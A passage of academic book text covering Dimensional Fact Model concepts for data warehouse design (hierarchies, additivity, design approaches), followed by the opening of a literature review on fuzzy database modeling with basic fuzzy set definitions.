The existence of apparently equal attributes does not always determine a convergence. If in the invoice fact we had a brand city attribute on the product hierarchy, representing the city where a brand is manufactured, there would be no convergence with attribute (customer) city, since a product manufactured in a city can obviously be sold to customers of other cities as well.
Cross-Dimension Attributes
Optional Arcs
Definition 9: A cross-dimension attribute is a (either dimension or descriptive) attribute whose value is determined by the combination of two or more dimension attributes, possibly belonging to different hierarchies. It is denoted by connecting through a curve line the arcs that determine it.
Definition 11: An optional arc models the fact that an association represented within the fact scheme is undefined for a subset of the events. An optional arc is graphically denoted by marking it with a dash.
Descriptive Attributes
For instance, if the VAT on a product depends on both the product category and the state where the product is sold, it can be represented by a crossdimension attribute as shown in Figure 4.
For instance, attribute diet takes a value only for food products; for the other products, it is undefined. In the presence of a set of optional arcs exiting from the same dimension attribute, their coverage can be denoted in order to pose a constraint on
93
Conceptual Modeling Solutions for the Data Warehouse
the optionalities involved. Like for IS-A hierarchies in the E/R model, the coverage of a set of optional arcs is characterized by two independent coordinates. Let a be a dimension attribute, and b1,..., bm be its children attributes connected by optional arcs: •
•
The coverage is total if each value of a always corresponds to a value for at least one of its children; conversely, if some values of a exist for which all of its children are undefined, the coverage is said to be partial. The coverage is disjoint if each value of a corresponds to a value for, at most, one of its children; conversely, if some values of a exist that correspond to values for two or more children, the coverage is said to be overlapped.
Thus, overall, there are four possible coverages, denoted by T-D, T-O, P-D, and P-O. Figure 4 shows an example of optionality annotated with its coverage. We assume that products can have three types: food, clothing, and household, since expiration date and size are defined only for, respectively, food and clothing, the coverage is partial and disjoint.
Multiple Arcs In most cases, as already said, hierarchies include attributes related by many-to-one associations. On the other hand, in some situations it is necessary to include also attributes that, for a single value taken by their father attribute, take several values. Figure 5. The fact schema for the SALES fact
94
Definition 12: A multiple arc is an arc, within a hierarchy, modeling a many-to-many association between the two dimension attributes it connects. Graphically, it is denoted by doubling the line that represents the arc. Consider the fact schema modeling the sales of books in a library, represented in Figure 5, whose dimensions are date and book. Users will probably be interested in analyzing sales for each book author; on the other hand, since some books have two or more authors, the relationship between book and author must be modeled as a multiple arc. Guideline 6: In presence of many-to-many associations, summarizability is no longer guaranteed, unless the multiple arc is properly weighted. Multiple arcs should be used sparingly since, in ROLAP logical design, they require complex solutions. Summarizability is the property of correcting summarizing measures along hierarchies (Lenz & Shoshani, 1997). Weights restore summarizability, but their introduction is artificial in several cases; for instance, in the book sales fact, each author of a multiauthored book should be assigned a normalized weight expressing her “contribution” to the book.
Shared Hierarchies Sometimes, large portions of hierarchies are replicated twice or more in the same fact schema. A typical example is the temporal hierarchy: a
Conceptual Modeling Solutions for the Data Warehouse
fact frequently has more than one dimension of type date, with different semantics, and it may be useful to define on each of them a temporal hierarchy month-week-year. Another example are geographic hierarchies, that may be defined starting from any location attribute in the fact schema. To avoid redundancy, the DFM provides a graphical shorthand for denoting hierarchy sharing. Figure 4 shows two examples of shared hierarchies. Fact INVOICE LINE has two date dimensions, with semantics invoice date and order date, respectively. This is denoted by doubling the circle that represents attribute date and specifying two roles invoice and order on the entering arcs. The second shared hierarchy is the one on agent, that may have two roles: the ordering agent, that is a dimension, and the agent who is responsible for a customer (optional). Guideline 8: Explicitly representing shared hierarchies on the fact schema is important since, during ROLAP logical design, it enables ad hoc solutions aimed at avoiding replication of data in dimension tables.
Ragged Hierarchies Let a1,..., an be a sequence of dimension attributes that define a path within a hierarchy (such as city, state, nation). Up to now we assumed that, for each value of a1, exactly one value for every other attribute on the path exists. In the previous case, this is actually true for each city in the U.S., while it is false for most European countries
where no decomposition in states is defined (see Figure 6). Definition 13: A ragged (or incomplete) hierarchy is a hierarchy where, for some instances, the values of one or more attributes are missing (since undefined or unknown). A ragged hierarchy is graphically denoted by marking with a dash the attributes whose values may be missing. As stated by Niemi (2001), within a ragged hierarchy each aggregation level has precise and consistent semantics, but the different hierarchy instances may have different length since one or more levels are missing, making the interlevel relationships not uniform (the father of “San Francisco” belongs to level state, the father of “Rome” to level nation). There is a noticeable difference between a ragged hierarchy and an optional arc. In the first case we model the fact that, for some hierarchy instances, there is no value for one or more attributes in any position of the hierarchy. Conversely, through an optional arc we model the fact that there is no value for an attribute and for all of its descendents. Guideline 9: Ragged hierarchies may lead to summarizability problems. A way for avoiding them is to fragment a fact into two or more facts, each including a subset of the hierarchies characterized by uniform interlevel relationships.
Figure 6. Ragged geographic hierarchies
95
Conceptual Modeling Solutions for the Data Warehouse
Thus, in the invoice example, fragmenting INVOICE LINE into U.S. INVOICE LINE and E.U. INVOICE LINE (the first with the state attribute, the second without state) restores the completeness of the geographic hierarchy.
Unbalanced Hierarchies Definition 14: An unbalanced (or recursive) hierarchy is a hierarchy where, though interattribute relationships are consistent, the instances may have different length. Graphically, it is represented by introducing a cycle within the hierarchy. A typical example of unbalanced hierarchy is the one that models the dependence interrelationships between working persons. Figure 4 includes an unbalanced hierarchy on sale agents: there are no fixed roles for the different agents, and the different “leaf” agents have a variable number of supervisor agents above them. Guideline 10: Recursive hierarchies lead to complex solutions during ROLAP logical design and to poor querying performance. A way for avoiding them is to “unroll” them for a given number of times.
Dynamic Hierarchies Time is a key factor in data warehousing systems, since the decision process is often based on the evaluation of historical series and on the comparison between snapshots of the enterprise taken at different moments. The multidimensional models implicitly assume that the only dynamic components described in a cube are the events that instantiate it; hierarchies are traditionally considered to be static. Of course this is not correct: sales manager alternate, though slowly, on different departments; new products are added every week to those already being sold; the product categories change, and their relationship with products change; sales districts can be modified, and a customer may be moved from one district to another.1 The conceptual representation of hierarchy dynamicity is strictly related to its impact on user queries. In fact, in presence of a dynamic hierarchy we may picture three different temporal scenarios for analyzing events (SAP, 1998): •
For instance, in the agent example, if the user states that two is the maximum number of interesting levels for the dependence relationship, the customer hierarchy could be transformed as in Figure 7.
• Figure 7. Unrolling the agent hierarchy •
96
Today for yesterday: All events are referred to the current configuration of hierarchies. Thus, assuming on January 1, 2005 the responsible agent for customer Smith has changed from Mr. Black to Mr. White, and that a new customer O’Hara has been acquired and assigned to Mr. Black, when computing the agent commissions all invoices for Smith are attributed to Mr. White, while only invoices for O’Hara are attributed to Mr. Black. Yesterday for today: All events are referred to some past configuration of hierarchies. In the previous example, all invoices for Smith are attributed to Mr. Black, while invoices for O’Hara are not considered. Today or yesterday (or historical truth): Each event is referred to the configuration hierarchies had at the time the event occurred. Thus, the invoices for Smith up to
Conceptual Modeling Solutions for the Data Warehouse
2004 and those for O’Hara are attributed to Mr. Black, while invoices for Smith from 2005 are attributed to Mr. White. While in the agent example, dynamicity concerns an arc of a hierarchy, the one expressing the many-to-one association between customer and agent, in some cases it may as well concern a dimension attribute: for instance, the name of a product category may change. Even in this case, the different scenarios are defined in much the same way as before. On the conceptual schema, it is useful to denote which scenarios the user is interested for each arc and attribute, since this heavily impacts on the specific solutions to be adopted during logical design. By default, we will assume that the only interesting scenario is today for yesterday—it is the most common one, and the one whose implementation on the star schema is simplest. If some attributes or arcs require different scenarios, the designer should specify them on a table like Table 2.
primary events into measure values characterizing each secondary event. From this point of view, we may distinguish three types of measures (Lenz & Shoshani, 1997): •
•
•
Flow measures: They refer to a time period, and are cumulatively evaluated at the end of that period. Examples are the number of products sold in a day, the monthly revenue, the number of those born in a year. Stock measures: They are evaluated at particular moments in time. Examples are the number of products in a warehouse, the number of inhabitants of a city, the temperature measured by a gauge. Unit measures: They are evaluated at particular moments in time, but they are expressed in relative terms. Examples are the unit price of a product, the discount percentage, the exchange rate of a currency.
The aggregation operators that can be used on the three types of measures are summarized in Table 3.
Additivity Aggregation requires defining a proper operator to compose the measure values characterizing
Definition 15: A measure is said to be additive along a dimension if its values can be aggregated along the corresponding hierarchy by the sum
Table 2. Temporal scenarios for the INVOICE fact arc/attribute
today for yesterday
yesterday for today
customer-resp. agent
YES
YES
customer-city
YES
today or yesterday YES YES
sale district
YES
Table 3. Valid aggregation operators for the three types of measures (Lenz, 1997) temporal hierarchies flow measures
nontemporal hierarchies
SUM, AVG, MIN, MAX
SUM, AVG, MIN, MAX
stock measures
AVG, MIN, MAX
SUM, AVG, MIN, MAX
unit measures
AVG, MIN, MAX
AVG, MIN, MAX
97
Conceptual Modeling Solutions for the Data Warehouse
operator, otherwise it is called nonadditive. A nonadditive measure is nonaggregable if no other aggregation operator can be used on it. Table 3 shows that, in general, flow measures are additive along all dimensions, stock measures are nonadditive along temporal hierarchies, and unit measures are nonadditive along all dimensions. On the invoice scheme, most measures are additive. For instance, quantity has flow type: the total quantity invoiced in a month is the sum of the quantities invoiced in the single days of that month. Measure unit price has unit type and is nonadditive along all dimensions. Though it cannot be summed up, it can still be aggregated by using operators such as average, maximum, and minimum. Since additivity is the most frequent case, in order to simplify the graphic notation in the DFM, only the exceptions are represented explicitly. In particular, a measure is connected to the dimensions along which it is nonadditive by a dashed line labeled with the other aggregation operators (if any) which can be used instead. If a measure is aggregated through the same operator along all dimensions, that operator can be simply reported on its side (see for instance unit price in Figure 4).
APPROACHES TO CONCEPTUAL DESIGN In this section we discuss how conceptual design can be framed within a methodology for DW design. The approaches to DW design are usually classified in two categories (Winter & Strauch, 2003): •
98
Data-driven (or supply-driven) approaches that design the DW starting from a detailed analysis of the data sources; user requirements impact on design by allowing the designer to select which chunks of data
•
are relevant for decision making and by determining their structure according to the multidimensional model (Golfarelli et al., 1998; Hüsemann et al., 2000). Requirement-driven (or demand-driven) approaches start from determining the information requirements of end users, and how to map these requirements onto the available data sources is investigated only a posteriori (Prakash & Gosain, 2003; Schiefer, List & Bruckner, 2002).
While data-driven approaches somehow simplify the design of ETL (extraction, transformation, and loading), since each data in the DW is rooted in one or more attributes of the sources, they give user requirements a secondary role in determining the information contents for analysis, and give the designer little support in identifying facts, dimensions, and measures. Conversely, requirement-driven approaches bring user requirements to the foreground, but require a larger effort when designing ETL.
Data-Driven Approaches Data-driven approaches are feasible when all of the following are true: (1) detailed knowledge of data sources is available a priori or easily achievable; (2) the source schemata exhibit a good degree of normalization; (3) the complexity of source schemata is not high. In practice, when the chosen architecture for the DW relies on a reconciled level (or operational data store) these requirements are largely satisfied: in fact, normalization and detailed knowledge are guaranteed by the source integration process. The same holds, thanks to a careful source recognition activity, in the frequent case when the source is a single relational database, well-designed and not very large. In a data-driven approach, requirement analysis is typically carried out informally, based on simple requirement glossaries (Lechtenbörger,
Conceptual Modeling Solutions for the Data Warehouse
2001) rather than on formal diagrams. Conceptual design is then heavily rooted on source schemata and can be largely automated. In particular, the designer is actively supported in identifying dimensions and measures, in building hierarchies, in detecting convergences and shared hierarchies. For instance, the approach proposed by Golfarelli et al. (1998) consists of five steps that, starting from the source schema expressed either by an E/R schema or a relational schema, create the conceptual schema for the DW:
order to more accurately capture users’ needs; for instance, the goal-oriented approach proposed by Giorgini, Rizzi, and Garzetti (2005) is based on an extension of the Tropos formalism and includes the following steps: 1.
2. 1. 2.
3. 4. 5.
Choose facts of interest on the source schema For each fact, build an attribute tree that captures the functional dependencies expressed by the source schema Edit the attribute trees by adding/deleting attributes and functional dependencies Choose dimensions and measures Create the fact schemata
While step 2 is completely automated, some advanced constructs of the DFM are manually applied by the designer during step 5. On-the-field experience shows that, when applicable, the data-driven approach is preferable since it reduces the overall time necessary for design. In fact, not only conceptual design can be partially automated, but even ETL design is made easier since the mapping between the data sources and the DW is derived at no additional cost during conceptual design.
Requirement-Driven Approaches Conversely, within a requirement-driven framework, in the absence of knowledge of the source schema, the building of hierarchies cannot be automated; the main assurance of a satisfactory result is the skill and experience of the designer, and the designer’s ability to interact with the domain experts. In this case it may be worth adopting formal techniques for specifying requirements in
3. 4.
Create, in the Tropos formalism, an organizational model that represents the stakeholders, their relationships, their goals as well as the relevant facts for the organization and the attributes that describe them. Create, in the Tropos formalism, a decisional model that expresses the analysis goals of decision makers and their information needs. Create preliminary fact schemata from the decisional model. Edit the fact schemata, for instance, by detecting functional dependencies between dimensions, recognizing optional dimensions, and unifying measures that only differ for the aggregation operator.
This approach is, in our view, more difficult to pursue than the previous one. Nevertheless, it is the only alternative when a detailed analysis of data sources cannot be made (for instance, when the DW is fed from an ERP system), or when the sources come from legacy systems whose complexity discourages recognition and normalization.
Mixed Approaches Finally, also a few mixed approaches to design have been devised, aimed at joining the facilities of data-driven approaches with the guarantees of requirement-driven ones (Bonifati, Cattaneo, Ceri, Fuggetta, & Paraboschi, 2001; Giorgini et al., 2005). Here the user requirements, captured by means of a goal-oriented formalism, are matched with the schema of the source database to drive the algorithm that generates the conceptual schema for the DW. For instance, the approach proposed by Giorgini et al. (2005) encompasses three phases: 99
Conceptual Modeling Solutions for the Data Warehouse
1.
2.
3.
4.
5.
Create, in the Tropos formalism, an organizational model that represents the stakeholders, their relationships, their goals, as well as the relevant facts for the organization and the attributes that describe them. Create, in the Tropos formalism, a decisional model that expresses the analysis goals of decision makers and their information needs. Map facts, dimensions, and measures identified during requirement analysis onto entities in the source schema. Generate a preliminary conceptual schema by navigating the functional dependencies expressed by the source schema. Edit the fact schemata to fully meet the user expectations.
Note that, though step 4 may be based on the same algorithm employed in step 2 of the datadriven approach, here navigation is not “blind” but rather it is actively biased by the user requirements. Thus, the preliminary fact schemata generated here may be considerably simpler and smaller than those obtained in the data-driven approach. Besides, while in that approach the analyst is asked for identifying facts, dimensions, and measures directly on the source schema, here such identification is driven by the diagrams developed during requirement analysis. Overall, the mixed framework is recommendable when source schemata are well-known but their size and complexity are substantial. In fact, the cost for a more careful and formal analysis of requirement is balanced by the quickening of conceptual design.
joint discussion at the Perspective Seminar on “Data Warehousing at the Crossroads” that took place at Dagstuhl, Germany on August 2004. •
•
OPEN ISSUES A lot of work has been done in the field of conceptual modeling for DWs; nevertheless some very important issues still remain open. We report some of them in this section, as they emerged during
100
•
Lack of a standard: Though several conceptual models have been proposed, none of them has been accepted as a standard so far, and all vendors propose their own proprietary design methods. We see two main reasons for this: (1) though the conceptual models devised are semantically rich, some of the modeled properties cannot be expressed in the target logical models, so the translation from conceptual to logical is incomplete; and (2) commercial CASE tools currently enable designers to directly draw logical schemata, thus no industrial push is given to any of the models. On the other hand, a unified conceptual model for DWs, implemented by sophisticated CASE tools, would be a valuable support for both the research and industrial communities. Design patterns: In software engineering, design patterns are a precious support for designers since they propose standard solutions to address common modeling problems. Recently, some preliminary attempts have been made to identify relevant patterns for multidimensional design, aimed at assisting DW designers during their modeling tasks by providing an approach for recognizing dimensions in a systematic and usable way (Jones & Song, 2005). Though we agree that DW design would undoubtedly benefit from adopting a pattern-based approach, and we also recognize the utility of patterns in increasing the effectiveness of teaching how to design, we believe that further research is necessary in order to achieve a more comprehensive characterization of multidimensional patterns for both conceptual and logical design. Modeling security: Information security is a serious requirement that must be carefully
Conceptual Modeling Solutions for the Data Warehouse
•
considered in software engineering, not in isolation but as an issue underlying all stages of the development life cycle, from requirement analysis to implementation and maintenance. The problem of information security is even bigger in DWs, as these systems are used to discover crucial business information in strategic decision making. Some approaches to security in DWs, focused, for instance, on access control and multilevel security, can be found in the literature (see, for instance, Priebe & Pernul, 2000), but neither of them treats security as comprising all stages of the DW development cycle. Besides, the classical security model used in transactional databases, centered on tables, rows, and attributes, is unsuitable for DW and should be replaced by an ad hoc model centered on the main concepts of multidimensional modeling—such as facts, dimensions, and measures. Modeling ETL: ETL is a cornerstone of the data warehousing process, and its design and implementation may easily take 50% of the total time for setting up a DW. In the literature some approaches were devised for conceptual modeling of the ETL process from either the functional (Vassiliadis, Simitsis, & Skiadopoulos, 2002), the dynamic (Bouzeghoub, Fabret, & Matulovic, 1999), or the static (Calvanese, De Giacomo, Lenzerini, Nardi, & Rosati, 1998) points of view. Recently, also some interesting work on translating conceptual into logical ETL schemata has been done (Simitsis, 2005). Nevertheless, issues such as the optimization of ETL logical schemata are not very well understood. Besides, there is a need for techniques that automatically propagate changes occurred in the source schemas to the ETL process.
CONCLUSION In this chapter we have proposed a set of solutions for conceptual modeling of a DW according to the DFM. Since 1998, the DFM has been successfully adopted, in real DW projects mainly in the fields of retail, large distribution, telecommunications, health, justice, and instruction, where it has proved expressive enough to capture a wide variety of modeling situations. Remarkably, in most projects the DFM was also used to directly support dialogue with end users aimed at validating requirements, and to express the expected workload for the DW to be used for logical and physical design. This was made possible by the adoption of a CASE tool named WAND (warehouse integrated designer), entirely developed at the University of Bologna, that assists the designer in structuring a DW. WAND carries out data-driven conceptual design in a semiautomatic fashion starting from the logical scheme of the source database (see Figure 8), allows for a core workload to be defined on the conceptual scheme, and carries out workload-based logical design to produce an optimized relational scheme for the DW (Golfarelli & Rizzi, 2001). Overall, our on-the-field experience confirmed that adopting conceptual modeling within a DW project brings great advantages since:
Figure 8. Editing a fact schema in WAND
101
Conceptual Modeling Solutions for the Data Warehouse
•
•
•
• •
Conceptual schemata are the best support for discussing, verifying, and refining user specifications since they achieve the optimal trade-off between expressivity and clarity. Star schemata could hardly be used to this purpose. For the same reason, conceptual schemata are an irreplaceable component of the documentation for the DW project. They provide a solid and platform-independent foundation for logical and physical design. They are an effective support for maintaining and extending the DW. They make turn-over of designers and administrators on a DW project quicker and simpler.
REFERENCES Abelló, A., Samos, J., & Saltor, F. (2002, July 17-19). YAM2 (Yet another multidimensional model): An extension of UML. In Proceedings of the International Database Engineering & Applications Symposium (pp. 172-181). Edmonton, Canada. Agrawal, R., Gupta, A., & Sarawagi, S. (1995). Modeling multidimensional databases (IBM Research Report). IBM Almaden Research Center, San Jose, CA. Bonifati, A., Cattaneo, F., Ceri, S., Fuggetta, A., & Paraboschi, S. (2001). Designing data marts for data warehouses. ACM Transactions on Software Engineering and Methodology, 10(4), 452-483. Bouzeghoub, M., Fabret, F., & Matulovic, M. (1999). Modeling data warehouse refreshment process as a workflow application. In Proceedings of the International Workshop on Design and Management of Data Warehouses, Heidelberg, Germany.
102
Cabibbo, L., & Torlone, R. (1998, March 23-27). A logical approach to multidimensional databases. In Proceedings of the International Conference on Extending Database Technology (pp. 183-197). Valencia, Spain. Calvanese, D., De Giacomo, G., Lenzerini, M., Nardi, D., & Rosati, R. (1998, August 20-22). Information integration: Conceptual modeling and reasoning support. In Proceedings of the International Conference on Cooperative Information Systems (pp. 280-291). New York. Datta, A., & Thomas, H. (1997). A conceptual model and algebra for on-line analytical processing in data warehouses. In Proceedings of the Workshop for Information Technology and Systems (pp. 91-100). Fahrner, C., & Vossen, G. (1995). A survey of database transformations based on the entity-relationship model. Data & Knowledge Engineering, 15(3), 213-250. Franconi, E., & Kamble, A. (2004a, June 7-11). The GMD data model and algebra for multidimensional information. In Proceedings of the Conference on Advanced Information Systems Engineering (pp. 446-462). Riga, Latvia. Franconi, E., & Kamble, A. (2004b). A data warehouse conceptual data model. In Proceedings of the International Conference on Statistical and Scientific Database Management (pp. 435-436). Giorgini, P., Rizzi, S., & Garzetti, M. (2005, November 4-5). Goal-oriented requirement analysis for data warehouse design. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 47-56). Bremen, Germany. Golfarelli, M., Maio, D., & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems, 7(2-3), 215-247.
Conceptual Modeling Solutions for the Data Warehouse
Golfarelli, M., & Rizzi, S. (2001, April 2-6). WAND: A CASE tool for data warehouse design. In Demo Proceedings of the International Conference on Data Engineering (pp. 7-9). Heidelberg, Germany. Gyssens, M., & Lakshmanan, L. V. S. (1997). A foundation for multi-dimensional databases. In Proceedings of the International Conference on Very Large Data Bases (pp. 106-115), Athens, Greece. Hüsemann, B., Lechtenbörger, J., & Vossen, G. (2000). Conceptual data warehouse design. In Proceedings of the International Workshop on Design and Management of Data Warehouses, Stockholm, Sweden. Jones, M. E., & Song, I. Y. (2005). Dimensional modeling: Identifying, classifying & applying patterns. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 29-38). Bremen, Germany. Kimball, R. (1996). The data warehouse toolkit. New York: John Wiley & Sons. Lechtenbörger , J. (2001). Data warehouse schema design (Tech. Rep. No. 79). DISDBIS Akademische Verlagsgesellschaft Aka GmbH, Germany. Lenz, H. J., & Shoshani, A. (1997). Summarizability in OLAP and statistical databases. In Proceedings of the 9th International Conference on Statistical and Scientific Database Management (pp. 132-143). Washington, DC. Li, C., & Wang, X. S. (1996). A data model for supporting on-line analytical processing. In Proceedings of the International Conference on Information and Knowledge Management (pp. 81-88). Rockville, Maryland. Luján-Mora, S., Trujillo, J., & Song, I. Y. (2002). Extending the UML for multidimensional modeling. In Proceedings of the International Con-
ference on the Unified Modeling Language (pp. 290-304). Dresden, Germany. Niemi, T., Nummenmaa, J., & Thanisch, P. (2001, June 4). Logical multidimensional database design for ragged and unbalanced aggregation. Proceedings of the 3rd International Workshop on Design and Management of Data Warehouses, Interlaken, Switzerland (p. 7). Nguyen, T. B., Tjoa, A. M., & Wagner, R. (2000). An object-oriented multidimensional data model for OLAP. In Proceedings of the International Conference on Web-Age Information Management (pp. 69-82). Shanghai, China. Pedersen, T. B., & Jensen, C. (1999). Multidimensional data modeling for complex data. In Proceedings of the International Conference on Data Engineering (pp. 336-345). Sydney, Austrialia. Prakash, N., & Gosain, A. (2003). Requirements driven data warehouse development. In Proceedings of the Conference on Advanced Information Systems Engineering—Short Papers, Klagenfurt/ Velden, Austria. Priebe, T., & Pernul, G. (2000). Towards OLAP security design: Survey and research issues. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 33-40). Washington, DC. SAP. (1998). Data modeling with BW. SAP America Inc. and SAP AG, Rockville, MD. Sapia, C., Blaschka, M., Hofling, G., & Dinter, B. (1998). Extending the E/R model for the multidimensional paradigm. In Proceedings of the International Conference on Conceptual Modeling, Singapore. Schiefer, J., List, B., & Bruckner, R. (2002). A holistic approach for managing requirements of data warehouse systems. In Proceedings of the Americas Conference on Information Systems.
103
Conceptual Modeling Solutions for the Data Warehouse
Sen, A., & Sinha, A. P. (2005). A comparison of data warehousing methodologies. Communications of the ACM, 48(3), 79-84. Simitsis, A. (2005). Mapping conceptual to logical models for ETL processes. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 67-76). Bremen, Germany. Tryfona, N., Busborg, F., & Borch Christiansen, J. G. (1999). starER: A conceptual model for data warehouse design. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP, Kansas City, Kansas (pp. 3-8). Tsois, A., Karayannidis, N., & Sellis, T. (2001). MAC: Conceptual data modeling for OLAP. In Proceedings of the International Workshop on Design and Management of Data Warehouses (pp. 5.1-5.11). Interlaken, Switzerland. Vassiliadis, P. (1998). Modeling multidimensional databases, cubes and cube operations. In Proceedings of the 10th International Conference on Statistical and Scientific Database Management, Capri, Italy.
Vassiliadis, P., Simitsis, A., & Skiadopoulos, S. (2002, November 8). Conceptual modeling for ETL processes. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 14-21). McLean, VA. Winter, R., & Strauch, B. (2003). A method for demand-driven information requirements analysis in data warehousing projects. In Proceedings of the Hawaii International Conference on System Sciences, Kona (pp. 1359-1365).
ENDNOTE 1
In this chapter we will only consider dynamicity at the instance level. Dynamicity at the schema level is related to the problem of evolution of DWs and is outside the scope of this chapter.
This work was previously published in Data Warehouses and OLAP: Concepts, Architectures and Solutions, edited by R. Wrembel and C. Koncilia, pp. 1-26, copyright 2007 by IRM Press (an imprint of IGI Global).
104
105
Chapter 1.7
A Literature Overview of Fuzzy Database Modeling Z. M. Ma Northeastern University, China
ABSTRACT Fuzzy set theory has been extensively applied to extend various data models and resulted in numerous contributions, mainly with respect to the popular relational model or to some related form of it. To satisfy the need of modeling complex objects with imprecision and uncertainty, recently many researches have been concentrated on fuzzy semantic (conceptual) and object-oriented data models. This chapter reviews fuzzy database modeling technologies, including fuzzy conceptual data models and database models. Concerning fuzzy database models, fuzzy relational databases, fuzzy nested relational databases, and fuzzy object-oriented databases are discussed, respectively.
INTRODUCTION A major goal for database research has been the incorporation of additional semantics into the
data model. Classical data models often suffer from their incapability of representing and manipulating imprecise and uncertain information that may occur in many real-world applications. Since the early 1980s, Zadeh’s fuzzy logic (Zadeh, 1965) has been used to extend various data models. The purpose of introducing fuzzy logic in databases is to enhance the classical models such that uncertain and imprecise information can be represented and manipulated. This resulted in numerous contributions, mainly with respect to the popular relational model or to some related form of it. Also rapid advances in computing power have brought opportunities for databases in emerging applications in CAD/CAM, multimedia and geographic information systems (GIS). These applications characteristically require the modeling and manipulation of complex objects and semantic relationships. It has been proved that the object-oriented paradigm lends itself extremely well to the requirements. Since classical relational database model and its extension of fuzziness do
not satisfy the need of modeling complex objects with imprecision and uncertainty, currently many researches have been concentrated on fuzzy object-oriented database models in order to deal with complex objects and uncertain data together. Database modeling can be carried out at two different levels: conceptual data modeling and database modeling. Therefore, we have conceptual data models (e.g., ER/EER and UML) and logical database models (relational databases, nested relational databases, and object-oriented databases). Logical database models are often created through mapping conceptual data models into logical database models. This conversion is called conceptual design of databases. Since fuzzy database approaches were first created in the late 1970s by several research groups, a significant body of research in the area of fuzzy database modeling has been developed over the past 30 years. Although there have been a lot of fuzzy database papers, ones only find few comprehensive review papers of fuzzy database modeling (Yazici, Buckles, & Petry, 1992; Kerre & Chen, 1995). It has been nearly 10 years since a latest comprehensive overview paper has appeared in this area (Kerre & Chen, 1995). This chapter aims to provide a literature overview of fuzzy database modeling to satisfy the obvious need for an updating. The topics of the literature referred in the chapter include fuzzy logical database modeling, fuzzy conceptual data modeling, and design and implementation of fuzzy databases. It should be noticed that, however, it does not means that this chapter covers all publications in the research area and gives complete descriptions. The remainder of this chapter is organized as follows. The second section gives the basic knowledge about imperfect information and fuzzy sets theory. Issues about fuzzy logical (relational, nested relational, object-oriented, and objectrelational) database models are described in the third section. The fourth section investigates issues about fuzzy conceptual data (ER/EER, IFO, and UML) models. The fifth section discusses
106
issues about design and implementation of fuzzy databases, including the conceptual design, indexing techniques, and prototypes. The last section concludes this chapter.
IMPERFECT INFORMATION AND FUZZY SETS THEORY Inconsistency, imprecision, vagueness, uncertainty, and ambiguity are five basic kinds of imperfect information in database systems in (Bosc & Prade, 1993). Inconsistency is a kind of semantic conflict, meaning the same aspect of the real world is irreconcilably represented more than once in a database or in several different databases. Information inconsistency usually comes from information integration. Intuitively, the imprecision and vagueness are relevant to the content of an attribute value, and it means that a choice must be made from a given range (interval or set) of values but we do not know exactly which one to choose at present. In general, vague information is represented by linguistic values. The uncertainty is related to the degree of truth of its attribute value, and it means that we can apportion some, but not all, of our belief to a given value or a group of values. The random uncertainty, described using probability theory, is not considered in the paper. The ambiguity means that some elements of the model lack complete semantics leading to several possible interpretations. Generally, several different kinds of imperfection can co-exist with respect to the same piece of information. Imprecision, uncertainty, and vagueness are three major types of imperfect information. Vagueness and uncertainty can be modeled with possibility theory (Zadeh, 1978). Many of the existing approaches dealing with imprecision and uncertainty are based on the theory of fuzzy sets (Zadeh, 1965). Smets (1997) presents some aspects of imperfection, in which imprecision, inconsistency, and uncertainty are the major groups. Imprecision
A Literature Overview of Fuzzy Database Modeling
and inconsistency are properties related to the content of the statement: either more than one world or no world is compatible with the available information, respectively. Uncertainty is a property that results from a lack of information about the world for deciding if the statement is true or false. Imprecision and inconsistency are essentially properties of the information itself whereas uncertainty is a property of the relation between the information and our knowledge about the world. To model imprecision and uncertainty, the various approaches are presented in (Smets, 1997). These models are grouped into two large categories, namely, the symbolic and the quantitative models. Fuzzy sets introduced by Zadeh (1965) have been widely used for the quantification of imprecision. Fuzzy data was originally described as a fuzzy set by Zadeh (1965). Let U be a universe of discourse. A fuzzy value on U is characterized by a fuzzy set F in U. A membership function:
Here, πX (ui), ui ∈ U denotes the possibility that ui is true. Let πX and F be the possibility distribution representation and the fuzzy set representation for a fuzzy value, respectively. Let A and B be fuzzy sets in the same universe of discourse U with the membership functions μA and μB, respectively. Then we have the following: •
∀u ∈ U, μA ∪ B (u) = max (μA (u), μB (u)). •
•
F = {μF (u1)/u1, μF (u2)/u2, ..., μF (un)/un} When U is an infinite set, then the fuzzy set F can be represented by: F=
∫
F
u u
u ∈U
When the membership function μF (u) above is explained to be a measure of the possibility that a variable X has the value u, where X takes values in U, a fuzzy value is described by a possibility distribution πX (Zadeh, 1978). πX = {πX (u1)/u1, πX (u2)/u2, ..., πX (un)/un}
Intersection: The intersection of fuzzy sets A and B, denoted A ∩ B, is a fuzzy set on U with the membership function μA ∩ B: U → [0, 1], where: ∀u ∈ U, μA ∩ B (u) = min (μA (u), μB (u)).
μF: U → [0, 1] is defined for the fuzzy set F, where μF (u), for each u ∈ U, denotes the degree of membership of u in the fuzzy set F. Thus the fuzzy set F is described as follows:
Union: The union of fuzzy sets A and B, denoted A ∪ B, is a fuzzy set on U with the membership function μA ∪ B: U → [0, 1], where:
Complementation: The complementation of fuzzy set Ā, denoted by Ā, is a fuzzy set on U with the membership function μĀ: U → [0, 1], where: ∀u ∈ U, μ Ā (u) = 1 − μA (u). Definition. A fuzzy set F of the universe of discourse U is convex if and only if for all u1, u2 in U: μF (λu1 + (1 − λ) u2) ≥ min (μF (u1), μF (u1)) where λ ∈ [0, 1]. Definition. A fuzzy set F of the universe of discourse U is called a normal fuzzy set if ∃ u ∈ U, μF (u) = 1.
107
A Literature Overview of Fuzzy Database Modeling
Definition. A fuzzy number is a fuzzy subset in the universe of discourse U that is both convex and normal. Now several notions related to fuzzy numbers are discussed. Let U be a universe of discourse and F a fuzzy number in U with the membership function μF: U → [0, 1]. We have then the following notions: •
•
Support: The set of elements that have nonzero degrees of membership in F is called the support of F, denoted by:
⎧[ x , ]y or [ x , ]y , if A ∩ B = Φ 2 ⎪ 1 1 2 ⎨ ⎪⎩[min ( x 1, x 2), max ( y 1, y 2)], if A ∩ B
Kernel: The set of elements that completely belong to F is called the kernel of F, denoted by:
FUZZY LOGICAL DATABASE MODELS
